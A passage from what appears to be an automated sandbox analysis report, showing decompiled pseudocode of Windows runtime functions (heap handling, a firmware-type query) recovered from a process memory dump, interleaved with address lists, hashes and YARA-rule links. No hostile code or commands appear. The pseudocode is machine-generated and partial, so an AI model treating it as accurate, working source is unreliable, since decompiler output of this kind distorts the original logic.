				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E030EAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                                                                                                    0x030eb8f0
                                                                                                                                                    0x030eb8f2
                                                                                                                                                    0x030eb8f4
                                                                                                                                                    0x03132c4e
                                                                                                                                                    0x03132c50
                                                                                                                                                    0x03132c56
                                                                                                                                                    0x03132c5c
                                                                                                                                                    0x03132c60
                                                                                                                                                    0x03132c7f
                                                                                                                                                    0x03132c84
                                                                                                                                                    0x03132c62
                                                                                                                                                    0x03132c77
                                                                                                                                                    0x03132c7c
                                                                                                                                                    0x03132c8a
                                                                                                                                                    0x03132c8f
                                                                                                                                                    0x03132c94
                                                                                                                                                    0x03132c9c
                                                                                                                                                    0x03132ca5
                                                                                                                                                    0x03132ca5
                                                                                                                                                    0x03132c9c
                                                                                                                                                    0x03132c50
                                                                                                                                                    0x030eb8fa
                                                                                                                                                    0x030eb902
                                                                                                                                                    0x030eb921
                                                                                                                                                    0x030eb921
                                                                                                                                                    0x030eb924
                                                                                                                                                    0x030eb924
                                                                                                                                                    0x030eb927
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb929
                                                                                                                                                    0x030eb92b
                                                                                                                                                    0x030eb92d
                                                                                                                                                    0x030eb940
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb940
                                                                                                                                                    0x030eb932
                                                                                                                                                    0x030eb932
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb932
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb904
                                                                                                                                                    0x030eb904
                                                                                                                                                    0x030eb90a
                                                                                                                                                    0x030eb90c
                                                                                                                                                    0x030eb916
                                                                                                                                                    0x030eb919
                                                                                                                                                    0x030eb915
                                                                                                                                                    0x030eb915
                                                                                                                                                    0x030eb91b
                                                                                                                                                    0x030eb91b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb910

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2558761708
                                                                                                                                                    • Opcode ID: f02ac091f37ab441d1e33a489980a84a3cd9ad6e5a66cdd5a2236c7fee7ae82b
                                                                                                                                                    • Instruction ID: ce33e242997665ec94f735a79057fd2b6c5215c324807cb316f921b15e09d1cc
                                                                                                                                                    • Opcode Fuzzy Hash: f02ac091f37ab441d1e33a489980a84a3cd9ad6e5a66cdd5a2236c7fee7ae82b
                                                                                                                                                    • Instruction Fuzzy Hash: C511E23171B6069FD728EB1CC485B7AB3A9EF84A20F198469E45BCF351E730D885CA91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                    			E0318E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0318BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0318BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0318AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03109730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0318A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0318A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03109730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0318A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0318A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E030E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E030DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E030DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E030E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0317FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                                                    0x0318e547
                                                                                                                                                    0x0318e549
                                                                                                                                                    0x0318e54f
                                                                                                                                                    0x0318e553
                                                                                                                                                    0x0318e557
                                                                                                                                                    0x0318e55a
                                                                                                                                                    0x0318e55c
                                                                                                                                                    0x0318e55f
                                                                                                                                                    0x0318e561
                                                                                                                                                    0x0318e567
                                                                                                                                                    0x0318e56b
                                                                                                                                                    0x0318e7e2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e571
                                                                                                                                                    0x0318e575
                                                                                                                                                    0x0318e577
                                                                                                                                                    0x0318e57b
                                                                                                                                                    0x0318e57c
                                                                                                                                                    0x0318e57d
                                                                                                                                                    0x0318e57e
                                                                                                                                                    0x0318e57f
                                                                                                                                                    0x0318e588
                                                                                                                                                    0x0318e58f
                                                                                                                                                    0x0318e591
                                                                                                                                                    0x0318e592
                                                                                                                                                    0x0318e592
                                                                                                                                                    0x0318e596
                                                                                                                                                    0x0318e59e
                                                                                                                                                    0x0318e5a0
                                                                                                                                                    0x0318e5a6
                                                                                                                                                    0x0318e61d
                                                                                                                                                    0x0318e61d
                                                                                                                                                    0x0318e621
                                                                                                                                                    0x0318e623
                                                                                                                                                    0x0318e630
                                                                                                                                                    0x0318e630
                                                                                                                                                    0x0318e7e6
                                                                                                                                                    0x0318e7eb
                                                                                                                                                    0x0318e7ed
                                                                                                                                                    0x0318e7f4
                                                                                                                                                    0x0318e7fa
                                                                                                                                                    0x0318e7ff
                                                                                                                                                    0x0318e7ff
                                                                                                                                                    0x0318e80a
                                                                                                                                                    0x0318e812
                                                                                                                                                    0x0318e812
                                                                                                                                                    0x0318e5ab
                                                                                                                                                    0x0318e5b4
                                                                                                                                                    0x0318e5b9
                                                                                                                                                    0x0318e5be
                                                                                                                                                    0x0318e5c0
                                                                                                                                                    0x0318e5c2
                                                                                                                                                    0x0318e5c8
                                                                                                                                                    0x0318e5c9
                                                                                                                                                    0x0318e5cb
                                                                                                                                                    0x0318e5cc
                                                                                                                                                    0x0318e5d5
                                                                                                                                                    0x0318e5e4
                                                                                                                                                    0x0318e5f1
                                                                                                                                                    0x0318e5f8
                                                                                                                                                    0x0318e5f8
                                                                                                                                                    0x0318e5d5
                                                                                                                                                    0x0318e602
                                                                                                                                                    0x0318e616
                                                                                                                                                    0x0318e63d
                                                                                                                                                    0x0318e644
                                                                                                                                                    0x0318e64d
                                                                                                                                                    0x0318e652
                                                                                                                                                    0x0318e657
                                                                                                                                                    0x0318e659
                                                                                                                                                    0x0318e65b
                                                                                                                                                    0x0318e661
                                                                                                                                                    0x0318e662
                                                                                                                                                    0x0318e664
                                                                                                                                                    0x0318e665
                                                                                                                                                    0x0318e66e
                                                                                                                                                    0x0318e67d
                                                                                                                                                    0x0318e68a
                                                                                                                                                    0x0318e691
                                                                                                                                                    0x0318e691
                                                                                                                                                    0x0318e66e
                                                                                                                                                    0x0318e6b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e6b6
                                                                                                                                                    0x0318e6bd
                                                                                                                                                    0x0318e6c7
                                                                                                                                                    0x0318e6d7
                                                                                                                                                    0x0318e6d9
                                                                                                                                                    0x0318e6db
                                                                                                                                                    0x0318e6de
                                                                                                                                                    0x0318e6e3
                                                                                                                                                    0x0318e6f3
                                                                                                                                                    0x0318e6fc
                                                                                                                                                    0x0318e700
                                                                                                                                                    0x0318e700
                                                                                                                                                    0x0318e704
                                                                                                                                                    0x0318e70a
                                                                                                                                                    0x0318e70a
                                                                                                                                                    0x0318e713
                                                                                                                                                    0x0318e716
                                                                                                                                                    0x0318e719
                                                                                                                                                    0x0318e720
                                                                                                                                                    0x0318e761
                                                                                                                                                    0x0318e76b
                                                                                                                                                    0x0318e774
                                                                                                                                                    0x0318e77a
                                                                                                                                                    0x0318e77a
                                                                                                                                                    0x0318e78a
                                                                                                                                                    0x0318e791
                                                                                                                                                    0x0318e799
                                                                                                                                                    0x0318e79b
                                                                                                                                                    0x0318e79f
                                                                                                                                                    0x0318e7aa
                                                                                                                                                    0x0318e7c0
                                                                                                                                                    0x0318e7ac
                                                                                                                                                    0x0318e7b2
                                                                                                                                                    0x0318e7b9
                                                                                                                                                    0x0318e7b9
                                                                                                                                                    0x0318e7c7
                                                                                                                                                    0x0318e806
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e7c9
                                                                                                                                                    0x0318e7d1
                                                                                                                                                    0x0318e7d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e7d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e722
                                                                                                                                                    0x0318e72e
                                                                                                                                                    0x0318e748
                                                                                                                                                    0x0318e74c
                                                                                                                                                    0x0318e754
                                                                                                                                                    0x0318e756
                                                                                                                                                    0x0318e75c
                                                                                                                                                    0x0318e75c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e75c
                                                                                                                                                    0x0318e758
                                                                                                                                                    0x0318e758
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e758
                                                                                                                                                    0x0318e750
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e752
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e752
                                                                                                                                                    0x0318e730
                                                                                                                                                    0x0318e735
                                                                                                                                                    0x0318e73d
                                                                                                                                                    0x0318e73f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e741
                                                                                                                                                    0x0318e741
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e741
                                                                                                                                                    0x0318e739
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e73b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e73b
                                                                                                                                                    0x0318e722
                                                                                                                                                    0x0318e720
                                                                                                                                                    0x0318e6b0
                                                                                                                                                    0x0318e618
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0318e618

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: `$`
                                                                                                                                                    • API String ID: 0-197956300
                                                                                                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                                                    • Instruction ID: 03d42d0036b26b8460af523119f7fc809faedb3bc26c6c321f6ebb46eac9411b
                                                                                                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                                                    • Instruction Fuzzy Hash: 5C918C352043429FE724EF25C841B5BB7E5AF88714F18892DF9A5CB280E774E904CFA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                    			E031451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x31a05f0);
				E0311D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E030DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E031453CA(0);
						return E0311D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0310F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E030E3690(1, _t117, 0x30a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0310AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L030E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0310AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0314500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03109860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                                                    0x031451be
                                                                                                                                                    0x031451c3
                                                                                                                                                    0x031451c8
                                                                                                                                                    0x031451cd
                                                                                                                                                    0x031451d0
                                                                                                                                                    0x031451d3
                                                                                                                                                    0x031451d8
                                                                                                                                                    0x031451db
                                                                                                                                                    0x031451de
                                                                                                                                                    0x031451e0
                                                                                                                                                    0x031451e3
                                                                                                                                                    0x031451e6
                                                                                                                                                    0x031451e8
                                                                                                                                                    0x03145342
                                                                                                                                                    0x03145351
                                                                                                                                                    0x03145356
                                                                                                                                                    0x0314535a
                                                                                                                                                    0x03145360
                                                                                                                                                    0x03145363
                                                                                                                                                    0x03145366
                                                                                                                                                    0x03145369
                                                                                                                                                    0x03145369
                                                                                                                                                    0x0314536b
                                                                                                                                                    0x0314536b
                                                                                                                                                    0x03145370
                                                                                                                                                    0x031453a3
                                                                                                                                                    0x031453a4
                                                                                                                                                    0x031453a6
                                                                                                                                                    0x031453ab
                                                                                                                                                    0x031453ab
                                                                                                                                                    0x031453ae
                                                                                                                                                    0x031453ae
                                                                                                                                                    0x031453b5
                                                                                                                                                    0x031453bf
                                                                                                                                                    0x031453bf
                                                                                                                                                    0x03145375
                                                                                                                                                    0x03145396
                                                                                                                                                    0x031453a0
                                                                                                                                                    0x031453a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03145396
                                                                                                                                                    0x03145377
                                                                                                                                                    0x03145379
                                                                                                                                                    0x0314537f
                                                                                                                                                    0x0314538c
                                                                                                                                                    0x03145390
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03145390
                                                                                                                                                    0x031451ee
                                                                                                                                                    0x031451f1
                                                                                                                                                    0x03145301
                                                                                                                                                    0x03145310
                                                                                                                                                    0x03145315
                                                                                                                                                    0x03145318
                                                                                                                                                    0x0314531b
                                                                                                                                                    0x03145320
                                                                                                                                                    0x0314532e
                                                                                                                                                    0x03145331
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03145331
                                                                                                                                                    0x03145328
                                                                                                                                                    0x03145329
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03145329
                                                                                                                                                    0x031451fa
                                                                                                                                                    0x03145235
                                                                                                                                                    0x03145236
                                                                                                                                                    0x03145239
                                                                                                                                                    0x0314523f
                                                                                                                                                    0x03145240
                                                                                                                                                    0x03145241
                                                                                                                                                    0x03145242
                                                                                                                                                    0x03145246
                                                                                                                                                    0x03145247
                                                                                                                                                    0x0314524e
                                                                                                                                                    0x03145251
                                                                                                                                                    0x03145267
                                                                                                                                                    0x03145269
                                                                                                                                                    0x0314526e
                                                                                                                                                    0x0314527d
                                                                                                                                                    0x0314527e
                                                                                                                                                    0x03145281
                                                                                                                                                    0x03145282
                                                                                                                                                    0x03145287
                                                                                                                                                    0x03145288
                                                                                                                                                    0x0314528a
                                                                                                                                                    0x0314528f
                                                                                                                                                    0x03145294
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0314529a
                                                                                                                                                    0x0314529c
                                                                                                                                                    0x0314529e
                                                                                                                                                    0x0314529e
                                                                                                                                                    0x031452a4
                                                                                                                                                    0x031452b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031452ba
                                                                                                                                                    0x031452bc
                                                                                                                                                    0x031452bc
                                                                                                                                                    0x031452d4
                                                                                                                                                    0x031452d9
                                                                                                                                                    0x031452dc
                                                                                                                                                    0x031452e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031452e7
                                                                                                                                                    0x031452f4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031452f4
                                                                                                                                                    0x03145270
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03145270
                                                                                                                                                    0x031451fc
                                                                                                                                                    0x031451fd
                                                                                                                                                    0x03145202
                                                                                                                                                    0x03145203
                                                                                                                                                    0x03145205
                                                                                                                                                    0x0314520a
                                                                                                                                                    0x0314520f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0314521b
                                                                                                                                                    0x03145226
                                                                                                                                                    0x0314522b
                                                                                                                                                    0x0314521d
                                                                                                                                                    0x0314521d
                                                                                                                                                    0x03145222
                                                                                                                                                    0x03145222
                                                                                                                                                    0x0314522d
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                                                    • Opcode ID: 1a14367b5a1b0090d2006120e453a2f659c830772487038528088a5e859b7b42
                                                                                                                                                    • Instruction ID: 82ea3867924b68ed7766ea93e6ede75b242992b825d522791b5914a5330fe131
                                                                                                                                                    • Opcode Fuzzy Hash: 1a14367b5a1b0090d2006120e453a2f659c830772487038528088a5e859b7b42
                                                                                                                                                    • Instruction Fuzzy Hash: EB515BB5E007089FDB24DFA8C890AAEBBF9BF4D700F14406EE549EB291E7719940CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E030EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x31bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E030E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E03198CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03109E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0310B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0310CE00(_t97, _t68, 0x2710, 0);
